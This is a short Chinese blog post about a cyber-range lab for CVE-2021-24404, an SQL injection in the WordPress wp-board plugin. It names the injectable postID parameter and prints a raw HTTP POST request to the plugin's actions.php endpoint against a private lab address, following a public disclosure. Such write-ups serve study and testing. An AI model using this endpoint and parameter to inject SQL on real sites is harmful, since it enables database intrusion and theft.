【春秋云境】 CVE-2021-24404

最新推荐文章于 2024-05-18 16:01:49 发布

HMX404

最新推荐文章于 2024-05-18 16:01:49 发布

阅读量50

点赞数

文章标签： web 安全漏洞

原文链接：https://codevigilant.com/disclosure/2021/wp-plugin-wp-board/

版权

PoC Screenshots
screenshot 1

在这里插入图片描述
注入参数为： postID

POST /wp-content/plugins/wp-board/php/actions.php?action=modp&postID=0 HTTP/1.1
Host: 172.28.128.50
Content-Length: 19
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Sec-GPC: 1
Origin: http://172.28.128.50
Referer: http://172.28.128.50/wp-admin/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

newtext=sad&imp=off

转至：https://codevigilant.com/disclosure/2021/wp-plugin-wp-board/

关注博主即可阅读全文